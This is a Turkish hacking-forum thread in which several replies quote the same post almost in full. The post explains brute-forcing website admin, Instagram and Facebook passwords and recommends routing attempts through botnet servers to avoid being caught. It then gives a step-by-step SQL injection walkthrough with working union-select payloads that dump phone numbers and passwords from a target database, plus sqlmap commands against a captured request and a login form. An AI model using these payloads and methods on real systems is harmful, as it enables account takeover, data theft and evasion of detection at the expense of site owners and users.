Bruto forces bruto attck olarakda bilinir. Bruto forces kaba kuvvet saldırısıdır. Bruto force şu mantıkla çalışır hazırladığınız wordlistler sayesinde proramın txt dosyasındaki şifreleri teker teker kullanıp bulmasıdır. Bu saldırının başarılı olması sizin yazdığınız şifrelerin niteliğine bağlı. Ben ise önceden yazdığım bir cmd wordlist aracı ile -exe ye çevirip geliştirebilirsiniz- 6 basamaklı olabilcek tüm şifreleri yazıp hesaplıyor. Bu şekilde şifreyi bulma olasılığın yükselir ama bu günlerde sürebilir haftalar çünkü bu da 6 basamaklı olmasına rağmen neredeyse 1.000.000.000 sayı denemek demek bu ise zaman kaybıdır o yüzden farklı yöntemlere başvurun.

Bruto forces ile neler yapılabilir
Web site admin şifreleri bulunabilir
İnstagram şifreleri bulunabilir
Facebook şifreleri bulunabilir
Vb birçok şeyin şifresi bulunabilir.

Bu saldırıda yakalanma şansınız olabilir o yüzde bruto aracını ddos aracınız varsa eğer botnet ağındaki sunuculardan deneyerek hem kısa sürede işinizi halledersiniz aynı zamanda anonim olursunuz ama her zaman dediğim gibi vpn güvenli olmayabilir ama botnettede yakalanma şansınız var.
Bunu başka bir konuda cevaplıyıcam.

Wordlist yazılımı

[Gizli içerik]

Ekli dosyayı görüntüle 2184

Sql İnjection (Kör Sql)

Sql injection açığı php ve asp sitelerde görünür.
Php sitelerin id kısımlarında açık aranır.
Bu açık için bir çok yazılım geliştirildi ama bunlardan en çok bilineni havij ve sqlmap havij sqlmap ten eski olsada kolay kullanımı ile havij daha fazla tercih ediliyor
Peki ya bu açığı manuel nasıl buluruz.
Bu dorkları kullanacağız kullanacağız veya php veya asp bir site seçeceğiz.
Dorklar çok olduğu için txtte

[Gizli içerik]

Hedef sitemiz hedefsite.com/index.php?id=15 olsun ilk olarak virgül nokta türü şeyler yazıp eşitlik olmayan sayılar sayfa değişene kadar bütün ıd lerde deniyeceğiz
hedefsite.com/index.php?id=15 ."1=2

sayfanın değiştiğini varsayalım artık kolon sayısına ihtiyacımız var bunun için id 15 ten sonra +and+1=1+order+by+1 yazıyoruz ve yine sayfa değişinceye kadar son sayıyı değiştiriyoruz.
hedefsite.com/index.php?id=15+and+1=1+order+by+1
hedefsite.com/index.php?id=15+and+1=1+order+by+2
hedefsite.com/index.php?id=15+and+1=1+order+by+3

3 te hata verdi o zaman kolon sayımız üç şimdi ise bunlardan hangisinin aktif oluğuna bakalım

hedefsite.com/index.php?id=1+and+1=0+union+select+0,1,2,3

Tablo Çekimi
Tablo Çekimi İçin 2 Numaralı Kolon Sayısını Kullancaz
hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(table_name),3+from+test_db.tables
Tablo Veri Çekimi

Normal Sql Gibi Bunuda Öyle Yapacağız Ama Tablo Adını Hexleme Yapmamız Gerektir Ben Örnek Olarak Hakan Tablosunu Çekcem Ve Bunun Hex Değerine Bakalım "68616b616e6e" Burdan Rahatca Bakabilirsiniz


hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(column_name),3+from+test_db.columns+where+table_name='68616b616e6e'


Kolon Veri Çekimi

Hakan Tablosundan Tel Ve Şifre Kolonları Çıktı. Tel Ve Şifre Kolonlarının Değerlerini Öğrenelim.Veriler Karışmasın Diye Kolonlar Arasında "0x3a" Kodunu Ekliyoruz.



hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,concat(Tel,0x3a,Şifre),3+from+hakan

Sqlmap İle İnj





İstek Dosyası İle Sqlmap Kullanarak İnjection İşlemi Yapacaz Kullandığınız Web Scanner Aracından İstek Bilgilerini Alıyorsunuz.

GET hedefsite.com/index.php?id=1 HTTP/1.1
Host: hedefsite.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4

Txt İçine Yazarak 1.txt Olarak Kayıt Yapıp Sqlmap Klasör İçine Atalım sqlmap -r 1.txt --dbs Yazarak İşleme Devam Edebilirsiniz.


POST SQLMAP İNJ


Bir login ya da arama formunda bulunan sql Injection zafiyetlerini tespit ve bunları exploit etmek için --data parametresiyle POST isteği yapcaz.
sqlmap.py -u "hedefsite.com/index.php?test=login" --data="loginname=admin&loginpass=admin&duration=mins30" -p "loginname" --dbms="MySQL"

POST bilgisini, hangi parametrenin test edileceğini (-p) ve DBMS bilgisini (--dbms) girdik.

eline saglık

 

Ekli dosyayı görüntüle 2182
Bruto Forces Attack

Bruto forces bruto attck olarakda bilinir. Bruto forces kaba kuvvet saldırısıdır. Bruto force şu mantıkla çalışır hazırladığınız wordlistler sayesinde proramın txt dosyasındaki şifreleri teker teker kullanıp bulmasıdır. Bu saldırının başarılı olması sizin yazdığınız şifrelerin niteliğine bağlı. Ben ise önceden yazdığım bir cmd wordlist aracı ile -exe ye çevirip geliştirebilirsiniz- 6 basamaklı olabilcek tüm şifreleri yazıp hesaplıyor. Bu şekilde şifreyi bulma olasılığın yükselir ama bu günlerde sürebilir haftalar çünkü bu da 6 basamaklı olmasına rağmen neredeyse 1.000.000.000 sayı denemek demek bu ise zaman kaybıdır o yüzden farklı yöntemlere başvurun.

Bruto forces ile neler yapılabilir
Web site admin şifreleri bulunabilir
İnstagram şifreleri bulunabilir
Facebook şifreleri bulunabilir
Vb birçok şeyin şifresi bulunabilir.

Bu saldırıda yakalanma şansınız olabilir o yüzde bruto aracını ddos aracınız varsa eğer botnet ağındaki sunuculardan deneyerek hem kısa sürede işinizi halledersiniz aynı zamanda anonim olursunuz ama her zaman dediğim gibi vpn güvenli olmayabilir ama botnettede yakalanma şansınız var.
Bunu başka bir konuda cevaplıyıcam.

Wordlist yazılımı

[Gizli içerik]

Ekli dosyayı görüntüle 2184

Sql İnjection (Kör Sql)

Sql injection açığı php ve asp sitelerde görünür.
Php sitelerin id kısımlarında açık aranır.
Bu açık için bir çok yazılım geliştirildi ama bunlardan en çok bilineni havij ve sqlmap havij sqlmap ten eski olsada kolay kullanımı ile havij daha fazla tercih ediliyor
Peki ya bu açığı manuel nasıl buluruz.
Bu dorkları kullanacağız kullanacağız veya php veya asp bir site seçeceğiz.
Dorklar çok olduğu için txtte

[Gizli içerik]

Hedef sitemiz hedefsite.com/index.php?id=15 olsun ilk olarak virgül nokta türü şeyler yazıp eşitlik olmayan sayılar sayfa değişene kadar bütün ıd lerde deniyeceğiz
hedefsite.com/index.php?id=15 ."1=2

sayfanın değiştiğini varsayalım artık kolon sayısına ihtiyacımız var bunun için id 15 ten sonra +and+1=1+order+by+1 yazıyoruz ve yine sayfa değişinceye kadar son sayıyı değiştiriyoruz.
hedefsite.com/index.php?id=15+and+1=1+order+by+1
hedefsite.com/index.php?id=15+and+1=1+order+by+2
hedefsite.com/index.php?id=15+and+1=1+order+by+3

3 te hata verdi o zaman kolon sayımız üç şimdi ise bunlardan hangisinin aktif oluğuna bakalım

hedefsite.com/index.php?id=1+and+1=0+union+select+0,1,2,3

Tablo Çekimi
Tablo Çekimi İçin 2 Numaralı Kolon Sayısını Kullancaz
hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(table_name),3+from+test_db.tables
Tablo Veri Çekimi

Normal Sql Gibi Bunuda Öyle Yapacağız Ama Tablo Adını Hexleme Yapmamız Gerektir Ben Örnek Olarak Hakan Tablosunu Çekcem Ve Bunun Hex Değerine Bakalım "68616b616e6e" Burdan Rahatca Bakabilirsiniz


hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(column_name),3+from+test_db.columns+where+table_name='68616b616e6e'


Kolon Veri Çekimi

Hakan Tablosundan Tel Ve Şifre Kolonları Çıktı. Tel Ve Şifre Kolonlarının Değerlerini Öğrenelim.Veriler Karışmasın Diye Kolonlar Arasında "0x3a" Kodunu Ekliyoruz.



hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,concat(Tel,0x3a,Şifre),3+from+hakan

Sqlmap İle İnj





İstek Dosyası İle Sqlmap Kullanarak İnjection İşlemi Yapacaz Kullandığınız Web Scanner Aracından İstek Bilgilerini Alıyorsunuz.

GET hedefsite.com/index.php?id=1 HTTP/1.1
Host: hedefsite.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4

Txt İçine Yazarak 1.txt Olarak Kayıt Yapıp Sqlmap Klasör İçine Atalım sqlmap -r 1.txt --dbs Yazarak İşleme Devam Edebilirsiniz.


POST SQLMAP İNJ


Bir login ya da arama formunda bulunan sql Injection zafiyetlerini tespit ve bunları exploit etmek için --data parametresiyle POST isteği yapcaz.
sqlmap.py -u "hedefsite.com/index.php?test=login" --data="loginname=admin&loginpass=admin&duration=mins30" -p "loginname" --dbms="MySQL"

POST bilgisini, hangi parametrenin test edileceğini (-p) ve DBMS bilgisini (--dbms) girdik.

Bakalım

 

eline saglık

eyw

 

Ekli dosyayı görüntüle 2182
Bruto Forces Attack

Bruto forces bruto attck olarakda bilinir. Bruto forces kaba kuvvet saldırısıdır. Bruto force şu mantıkla çalışır hazırladığınız wordlistler sayesinde proramın txt dosyasındaki şifreleri teker teker kullanıp bulmasıdır. Bu saldırının başarılı olması sizin yazdığınız şifrelerin niteliğine bağlı. Ben ise önceden yazdığım bir cmd wordlist aracı ile -exe ye çevirip geliştirebilirsiniz- 6 basamaklı olabilcek tüm şifreleri yazıp hesaplıyor. Bu şekilde şifreyi bulma olasılığın yükselir ama bu günlerde sürebilir haftalar çünkü bu da 6 basamaklı olmasına rağmen neredeyse 1.000.000.000 sayı denemek demek bu ise zaman kaybıdır o yüzden farklı yöntemlere başvurun.

Bruto forces ile neler yapılabilir
Web site admin şifreleri bulunabilir
İnstagram şifreleri bulunabilir
Facebook şifreleri bulunabilir
Vb birçok şeyin şifresi bulunabilir.

Bu saldırıda yakalanma şansınız olabilir o yüzde bruto aracını ddos aracınız varsa eğer botnet ağındaki sunuculardan deneyerek hem kısa sürede işinizi halledersiniz aynı zamanda anonim olursunuz ama her zaman dediğim gibi vpn güvenli olmayabilir ama botnettede yakalanma şansınız var.
Bunu başka bir konuda cevaplıyıcam.

Wordlist yazılımı

[Gizli içerik]

Ekli dosyayı görüntüle 2184

Sql İnjection (Kör Sql)

Sql injection açığı php ve asp sitelerde görünür.
Php sitelerin id kısımlarında açık aranır.
Bu açık için bir çok yazılım geliştirildi ama bunlardan en çok bilineni havij ve sqlmap havij sqlmap ten eski olsada kolay kullanımı ile havij daha fazla tercih ediliyor
Peki ya bu açığı manuel nasıl buluruz.
Bu dorkları kullanacağız kullanacağız veya php veya asp bir site seçeceğiz.
Dorklar çok olduğu için txtte

[Gizli içerik]

Hedef sitemiz hedefsite.com/index.php?id=15 olsun ilk olarak virgül nokta türü şeyler yazıp eşitlik olmayan sayılar sayfa değişene kadar bütün ıd lerde deniyeceğiz
hedefsite.com/index.php?id=15 ."1=2

sayfanın değiştiğini varsayalım artık kolon sayısına ihtiyacımız var bunun için id 15 ten sonra +and+1=1+order+by+1 yazıyoruz ve yine sayfa değişinceye kadar son sayıyı değiştiriyoruz.
hedefsite.com/index.php?id=15+and+1=1+order+by+1
hedefsite.com/index.php?id=15+and+1=1+order+by+2
hedefsite.com/index.php?id=15+and+1=1+order+by+3

3 te hata verdi o zaman kolon sayımız üç şimdi ise bunlardan hangisinin aktif oluğuna bakalım

hedefsite.com/index.php?id=1+and+1=0+union+select+0,1,2,3

Tablo Çekimi
Tablo Çekimi İçin 2 Numaralı Kolon Sayısını Kullancaz
hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(table_name),3+from+test_db.tables
Tablo Veri Çekimi

Normal Sql Gibi Bunuda Öyle Yapacağız Ama Tablo Adını Hexleme Yapmamız Gerektir Ben Örnek Olarak Hakan Tablosunu Çekcem Ve Bunun Hex Değerine Bakalım "68616b616e6e" Burdan Rahatca Bakabilirsiniz


hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(column_name),3+from+test_db.columns+where+table_name='68616b616e6e'


Kolon Veri Çekimi

Hakan Tablosundan Tel Ve Şifre Kolonları Çıktı. Tel Ve Şifre Kolonlarının Değerlerini Öğrenelim.Veriler Karışmasın Diye Kolonlar Arasında "0x3a" Kodunu Ekliyoruz.



hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,concat(Tel,0x3a,Şifre),3+from+hakan

Sqlmap İle İnj





İstek Dosyası İle Sqlmap Kullanarak İnjection İşlemi Yapacaz Kullandığınız Web Scanner Aracından İstek Bilgilerini Alıyorsunuz.

GET hedefsite.com/index.php?id=1 HTTP/1.1
Host: hedefsite.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4

Txt İçine Yazarak 1.txt Olarak Kayıt Yapıp Sqlmap Klasör İçine Atalım sqlmap -r 1.txt --dbs Yazarak İşleme Devam Edebilirsiniz.


POST SQLMAP İNJ


Bir login ya da arama formunda bulunan sql Injection zafiyetlerini tespit ve bunları exploit etmek için --data parametresiyle POST isteği yapcaz.
sqlmap.py -u "hedefsite.com/index.php?test=login" --data="loginname=admin&loginpass=admin&duration=mins30" -p "loginname" --dbms="MySQL"

POST bilgisini, hangi parametrenin test edileceğini (-p) ve DBMS bilgisini (--dbms) girdik.

Güzel konu ama ben bilmiyorum hiç bir şey

 

Ekli dosyayı görüntüle 2182
Bruto Forces Attack

Bruto forces bruto attck olarakda bilinir. Bruto forces kaba kuvvet saldırısıdır. Bruto force şu mantıkla çalışır hazırladığınız wordlistler sayesinde proramın txt dosyasındaki şifreleri teker teker kullanıp bulmasıdır. Bu saldırının başarılı olması sizin yazdığınız şifrelerin niteliğine bağlı. Ben ise önceden yazdığım bir cmd wordlist aracı ile -exe ye çevirip geliştirebilirsiniz- 6 basamaklı olabilcek tüm şifreleri yazıp hesaplıyor. Bu şekilde şifreyi bulma olasılığın yükselir ama bu günlerde sürebilir haftalar çünkü bu da 6 basamaklı olmasına rağmen neredeyse 1.000.000.000 sayı denemek demek bu ise zaman kaybıdır o yüzden farklı yöntemlere başvurun.

Bruto forces ile neler yapılabilir
Web site admin şifreleri bulunabilir
İnstagram şifreleri bulunabilir
Facebook şifreleri bulunabilir
Vb birçok şeyin şifresi bulunabilir.

Bu saldırıda yakalanma şansınız olabilir o yüzde bruto aracını ddos aracınız varsa eğer botnet ağındaki sunuculardan deneyerek hem kısa sürede işinizi halledersiniz aynı zamanda anonim olursunuz ama her zaman dediğim gibi vpn güvenli olmayabilir ama botnettede yakalanma şansınız var.
Bunu başka bir konuda cevaplıyıcam.

Wordlist yazılımı

[Gizli içerik]

Ekli dosyayı görüntüle 2184

Sql İnjection (Kör Sql)

Sql injection açığı php ve asp sitelerde görünür.
Php sitelerin id kısımlarında açık aranır.
Bu açık için bir çok yazılım geliştirildi ama bunlardan en çok bilineni havij ve sqlmap havij sqlmap ten eski olsada kolay kullanımı ile havij daha fazla tercih ediliyor
Peki ya bu açığı manuel nasıl buluruz.
Bu dorkları kullanacağız kullanacağız veya php veya asp bir site seçeceğiz.
Dorklar çok olduğu için txtte

[Gizli içerik]

Hedef sitemiz hedefsite.com/index.php?id=15 olsun ilk olarak virgül nokta türü şeyler yazıp eşitlik olmayan sayılar sayfa değişene kadar bütün ıd lerde deniyeceğiz
hedefsite.com/index.php?id=15 ."1=2

sayfanın değiştiğini varsayalım artık kolon sayısına ihtiyacımız var bunun için id 15 ten sonra +and+1=1+order+by+1 yazıyoruz ve yine sayfa değişinceye kadar son sayıyı değiştiriyoruz.
hedefsite.com/index.php?id=15+and+1=1+order+by+1
hedefsite.com/index.php?id=15+and+1=1+order+by+2
hedefsite.com/index.php?id=15+and+1=1+order+by+3

3 te hata verdi o zaman kolon sayımız üç şimdi ise bunlardan hangisinin aktif oluğuna bakalım

hedefsite.com/index.php?id=1+and+1=0+union+select+0,1,2,3

Tablo Çekimi
Tablo Çekimi İçin 2 Numaralı Kolon Sayısını Kullancaz
hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(table_name),3+from+test_db.tables
Tablo Veri Çekimi

Normal Sql Gibi Bunuda Öyle Yapacağız Ama Tablo Adını Hexleme Yapmamız Gerektir Ben Örnek Olarak Hakan Tablosunu Çekcem Ve Bunun Hex Değerine Bakalım "68616b616e6e" Burdan Rahatca Bakabilirsiniz


hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,group_concat(column_name),3+from+test_db.columns+where+table_name='68616b616e6e'


Kolon Veri Çekimi

Hakan Tablosundan Tel Ve Şifre Kolonları Çıktı. Tel Ve Şifre Kolonlarının Değerlerini Öğrenelim.Veriler Karışmasın Diye Kolonlar Arasında "0x3a" Kodunu Ekliyoruz.



hedefsite.com/index.php?id=1+and+1=1+union+select+0,1,concat(Tel,0x3a,Şifre),3+from+hakan

Sqlmap İle İnj





İstek Dosyası İle Sqlmap Kullanarak İnjection İşlemi Yapacaz Kullandığınız Web Scanner Aracından İstek Bilgilerini Alıyorsunuz.

GET hedefsite.com/index.php?id=1 HTTP/1.1
Host: hedefsite.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4

Txt İçine Yazarak 1.txt Olarak Kayıt Yapıp Sqlmap Klasör İçine Atalım sqlmap -r 1.txt --dbs Yazarak İşleme Devam Edebilirsiniz.


POST SQLMAP İNJ


Bir login ya da arama formunda bulunan sql Injection zafiyetlerini tespit ve bunları exploit etmek için --data parametresiyle POST isteği yapcaz.
sqlmap.py -u "hedefsite.com/index.php?test=login" --data="loginname=admin&loginpass=admin&duration=mins30" -p "loginname" --dbms="MySQL"

POST bilgisini, hangi parametrenin test edileceğini (-p) ve DBMS bilgisini (--dbms) girdik.

bakalım

 

eyvallah